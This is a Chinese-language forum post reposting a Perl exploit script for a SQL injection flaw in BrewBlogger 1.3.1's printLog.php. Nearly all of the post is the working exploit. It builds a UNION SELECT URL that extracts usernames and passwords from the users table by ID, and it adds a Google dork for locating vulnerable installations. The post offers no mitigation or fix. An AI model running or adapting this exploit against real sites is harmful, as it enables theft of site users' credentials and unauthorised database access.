‹‹ 上一主题 | 下一主题 ››
发新话题
打印

BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1119 小时 
注册时间
2007-10-23 
最后登录
2009-1-4 

资料收集奖 运营支持奖

楼主 发表于 2006-11-12 12:56  只看该作者

BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability

复制内容到剪贴板
代码:
#!/usr/bin/perl
###########################################################################################
#Target:
#
#     BewBlogger 1.3.1
#     [url]http://brewblogger.zkdigital.com[/url]
#
#Vulnerability:
#
#     SQL Injection
#
#Description:
#
#     BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
#     Since each user entry contains an auto-incrementing ID number, it is possible to
#     enumerate all user names and passwords stored in the 'users'database by iterating
#     through every possible ID number.
#
#Vulnerable Code (truncated):
#
#     $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
#     $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
#     $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
#     This script will produce a URL which will reveal the user name and password for
#     the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
#     the first user). The user name will be listed as "Method:" under 'General
#     Information', and the password will be listed as "Cost:".
#
#Usage:
#     ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
#     ./brewblogger.pl [url]www.beerblog.com[/url] 3
#     ./brewblogger.pl [url]www.mysite.com/beerblog[/url]
#
#Google Dork:
#
#     intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
#     Craig Heffner
#     heffnercj [at] gmail.com
#     [url]http://www.craigheffner.com[/url]
###########################################################################################


print &#39;
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
#                            #
# Discovered and coded by: Craig Heffner  #
###########################################
&#39;;

if(!$ARGV[0] || $ARGV[0] eq "-h"){
     print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
     exit;
}


if(!$ARGV[1]){
     $id = 2;
} else {
     $id = $ARGV[1];
}

$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
$a = 1;

while($a < 211){
     if($a == 8){
          $string .= "user_name,";
     } elsif($a == 9){
          $string .= "password,";
     } elsif($a == 210){
          $string .= "1";
     } else {
          $string .= "1,";
     }
     $a++;
}

print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题